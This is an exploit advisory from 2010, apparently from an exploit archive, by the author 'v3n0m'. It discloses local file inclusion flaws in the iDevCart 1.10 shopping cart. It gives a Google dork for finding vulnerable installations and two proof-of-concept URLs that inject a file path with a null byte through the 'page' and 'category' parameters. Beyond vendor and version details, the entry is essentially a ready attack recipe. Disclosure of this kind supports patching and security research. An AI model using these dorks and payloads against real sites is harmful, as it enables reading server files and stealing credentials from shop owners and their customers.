id: 15235
date: 12/24/2010
title: iDevSpot iDevCart 1.10 Multiple Local File Inclusion Vulnerabilities
author: v3n0m
cves: 

Author      : v3n0m (v3n0m666[at]live[dot]com)
Site        : http://yogyacarderlink.web.id/
Date        : December, 24-2010
Location    : Jakarta, Indonesia
Time Zone   : GMT +7:00
 
Application : iDevCart
Price       : $49.95
Version     : 1.10 Other versions may also be affected
Vendor      : http://www.idevspot.com/
Google Dorks    : "iDevCart 1.10 Shopping Cart Software"
 
Exploit & p0c
_____________
 
**[LFI]
http://127.0.0.1/[path]/index.php?page=[LFI]%00
http://127.0.0.1/[path]/index.php?page=browse&category=[LFI]%00
_________________________________________________



#  0day.today [2023-03-27]  #